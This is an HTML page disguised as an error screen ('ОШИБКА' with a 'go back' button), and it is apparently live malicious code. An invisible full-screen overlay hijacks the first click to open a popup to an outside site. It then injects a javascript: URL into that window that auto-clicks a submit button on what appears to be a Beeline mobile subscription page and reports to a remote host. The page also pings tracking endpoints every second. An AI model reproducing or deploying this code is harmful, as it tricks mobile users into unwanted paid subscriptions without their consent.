<!DOCTYPE html>
<html style="height: 100%;width: 100%;">
<head>
    <meta charset="utf-8" />
    <title>Ошибка</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="format-detection" content="telephone=no" />
</head>
<body style="height:100%;background-color: #313131;" >
<style type="text/css">
    *{
        padding: 0px;
        margin:0px; 
    }
</style>
     <div id='clickHandlesss' onclick='onclickHandler()' style="height: 100%;width:100%;position:fixed;z-index:1000;top:0;left:0; "></div>
      <div style="
    width: 100%;
    height: 125px;
    background-color: #d03a22;
    color: #fff;
    font-size: 30px;
    text-align: center;
    line-height: 125px;
    top:0px;
    
    position: absolute;
">ОШИБКА</div>
    <script type="text/javascript">
        var ID = new Date().getTime();
        function randomString() {
            var str = '';
            for (var i = 0; i < 5+Math.random()*15; i++) {
                str += String.fromCharCode('A'.charCodeAt(0) + parseInt(Math.random()*26))
            }
            return str;
        }
        console.log("HACHIKI");
        var enb = false;
        var opens = false;



        function sendAt() {
            if (enb) return; 
            var nameW = randomString();
            var w = window.open('http://20pbk.ru/XS3mhgja0y/', nameW);
            w.blur();
            end = true;
            window.focus();
            enb = true;
            var checkAt = function(){
                if (true) {

                try{
                    opens = true;
                    window.open('\u0000javascript:if(document.domain){if(document.domain==\'cdp.beeline.ru\'){setTimeout(function() { document.getElementById(\'wapSubmitBtn\').click(); },1500);var x=new XMLHttpRequest();x.open("GET","http://syme.pw/inj_loadid='+ID+'");x.send()}};', nameW);
                }catch(err){

                    var xxhttp = new XMLHttpRequest();
                    xxhttp.open("GET", "/errr", true);
                    xxhttp.send();

                }
            }

           // setTimeout(function(){checkAt()},15000);

        }

        setTimeout(function(){checkAt()},10000);

    }
    function ping(x){
        x++;
        var pg = new XMLHttpRequest();
        pg.open("GET", "/timmerid="+ID+"&sec="+x, true);
        pg.send();
        setTimeout(function(){ping(x)},1000);
    }



    var clickedOnce = false;
    function onclickHandler() {
	document.getElementById("clickHandlesss").style.display = "none";
        var xhttp = new XMLHttpRequest();
        xhttp.open("GET", "/clickid="+ID, true);
        xhttp.send();
        sendAt();     
        return false;
    }
    window.onload = function(){
        document.querySelector('#clickHandlesss').style.display='block';
        ping(0);
    }
</script>
<div style="
width: 90%;
    height: 125px;
    background-color: #224fd0;
    color: #fff;
    font-size: 30px;
    text-align: center;
    line-height: 125px;
    border-radius: 19px;
    margin: 195px 5%;
">
    Вернуться назад!
</div>
</body>
</html>
